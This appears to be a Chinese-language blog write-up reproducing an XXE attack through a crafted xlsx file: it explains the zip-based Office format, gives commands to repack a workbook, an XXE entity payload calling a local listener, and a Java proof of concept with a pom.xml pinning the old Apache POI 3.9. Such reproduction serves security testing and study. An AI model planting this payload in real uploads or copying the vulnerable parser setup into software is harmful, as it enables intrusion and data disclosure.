Excel的XXE攻击

漏洞复现
,

Excel的XXE攻击

一、概述

Microsoft Office从2007版本引入了新的开放的XML文件格式,基于压缩的ZIP文件格式规范,改后缀名为zip再解压缩可以发现其中多数是描述工作簿数据、元数据、文档信息的XML文件。

xls与xlsx格式不同,xls是特有的二进制格式,其核心结构是复合文档类型,而xlsx的核心结构是XML类型,采用基于XML的压缩方式。xls格式文件无法插入payload进行XXE攻击
测试的时候,根据功能点,docx,xlsx都可以尝试。

二、制作恶意的xlsx

制作xlsx:

1
2
unzip payload.xlsx
zip -r payload.xslx *

添加xxe的payload

1
2
<!DOCTYPE x [ <!ENTITY xxe SYSTEM "http://127.0.0.1:7788/xxe"> ]>
<x>&xxe;</x>

image

三、idea复现

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
import org.apache.poi.ss.usermodel.Cell;
import org.apache.poi.ss.usermodel.Row;
import org.apache.poi.xssf.usermodel.XSSFSheet;
import org.apache.poi.xssf.usermodel.XSSFWorkbook;
import java.io.File;
import java.io.FileInputStream;
import java.io.IOException;


public class poc {

    public static void main(String[] args) throws IOException, InterruptedException {
        File excelFile = new File("/Users/garck/D/java-code/javaStudy/excel_xxe/2/payload2.xlsx");
        FileInputStream in = new FileInputStream(excelFile);

        XSSFWorkbook workbook = new XSSFWorkbook(in);

        XSSFSheet sheet = workbook.getSheetAt(0);
        int total = sheet.getLastRowNum();

        for(Row row : sheet){
            for (Cell cell : row){
                System.out.println(cell.getStringCellValue()+" ");
            }
            System.out.println("");
        }

    }
}

pom.xml

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
    <modelVersion>4.0.0</modelVersion>

    <groupId>org.example</groupId>
    <artifactId>excel_xxe</artifactId>
    <version>1.0-SNAPSHOT</version>

    <properties>
        <maven.compiler.source>8</maven.compiler.source>
        <maven.compiler.target>8</maven.compiler.target>
    </properties>

    <dependencies>
        <dependency>
            <groupId>org.apache.poi</groupId>
            <artifactId>poi-ooxml</artifactId>
            <version>3.9</version>
        </dependency>
        <dependency>
            <groupId>org.apache.poi</groupId>
            <artifactId>ooxml-schemas</artifactId>
            <version>1.1</version>
        </dependency>
    </dependencies>
</project>

复现截图:

image